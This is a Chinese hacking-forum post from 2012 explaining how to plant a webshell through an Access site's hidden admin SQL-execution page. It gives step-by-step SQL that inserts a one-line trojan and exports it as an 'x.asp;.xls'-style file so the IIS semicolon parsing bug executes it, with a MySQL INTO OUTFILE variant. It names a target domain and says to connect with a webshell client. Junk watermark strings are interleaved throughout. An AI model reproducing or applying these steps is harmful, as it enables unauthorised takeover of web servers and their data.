中国网络渗透测试联盟
标题:
ACCESS执行SQL命令导出一句话SHELL
[打印本页]
作者:
admin
时间:
2012-9-13 17:53
标题:
ACCESS执行SQL命令导出一句话SHELL
好不容易进了后台,发现啥上传啊。备份啊多木有。
$ j) u' g; z" E8 b9 o
webshell一直拿不到。后来翻了一下源码。有一个执行SQL命令的
2 A0 B7 p) ]; R, J
文件。可后台没显示这功能。直接填上文件名字,执行命令的选项出来了,
1 U: l* r& r+ w/ z. A- _
然后就试用了下面的命令导出一句话木马。没想到成功了。命令方法如下:
- c- l+ ~ }( f A! K2 ^
1.create table cmd (a varchar(50))
8 m* M. W" ~+ y
2.insert into cmd (a) values (‘‘)
) @1 C" K/ v# O* E* Z3 P
3.select * into [a] in ‘D:\wwwroot\
www.koohik.com
\hacker.asa;.xls’ ‘excel 4.0;’ from cmd
/ ~- b7 @/ z O W3 U# | E! F
(把表cmd的内容导出为物理路径的一个EXCEL文件)
. n! }, ]4 l9 C3 [
4.drop table cmd
( L0 v$ |+ ^0 K2 F
利用IIS的BUG成功拿到了WEBSHELL。
. i, k0 A. W* v2 H6 ~
0 A E _( r/ S3 R/ g1 z F
直接菜刀里连接
http://www.chouwazi.com/data/xiao.asp;xiao.xls
一句话
% ] P8 P0 `2 i- _- ] Y6 m0 y
7 P* P1 U4 e) I8 d. R
SQL语句意思解释:
' M$ g( E" t! y* X" s
第一句
0 P; P4 M! t# J3 ~1 R( s& b
建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为50
' x& m- U+ z3 j" t3 H
8 G$ X2 E3 T( C$ \# ~1 P0 b& Q
第二句
0 v" e) q* Y/ \! H! b2 }
在表cmd的a字段插入一句话木马
! d ?1 j* G m2 I. f, C
第三句
0 O5 ^; L; a5 _% @+ D- R, t
把cmd表a的内容导出到路径e:\host\chouwazi.com\web\data\的EXCEL文件
5 v7 |) \# ~1 T- g* I
+ z1 e; _# W4 y9 s2 F
第四句
. a8 X2 n3 |/ c/ |0 T$ i+ C
删除建立的cmd表
! V+ h; e7 |+ z* i, M! K4 N, E/ f
* \+ ?: m: e3 A/ s; r3 D+ _
以下内容为测试:
8 m) u' W' D- {# X- n7 w
Access利用后台SQL执行命令功能导出WebShell:
' @' s" }7 i" ]5 e5 Q! [
这个更简单:
/ s: U' A, k1 ^) K3 @
[ol][li]Select 'asp一句话木马' into [vote] in 'd:/chouwazi.com/x.asp;.xls' 'excel 8.0;' from vote [/li][/ol]
9 h- g3 Z# v. t* b
或者
0 u, n1 C$ W( k5 u: ?! m
[ol][li]Select 'php一句话木马' into outfile 'F:/wwwroot/chouwazi.com/eval.php'; [/li][/ol]
: p" F- o; m8 B. B- l
9 r, z8 \, T# X' c1 I
后台有执行SQL语句功能(vote为已知表段)
2 C p) G, ]: G5 h
希望对大家有所帮助拿shell的又一个思路
4 ]2 _( T! g) E) W# D* N
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2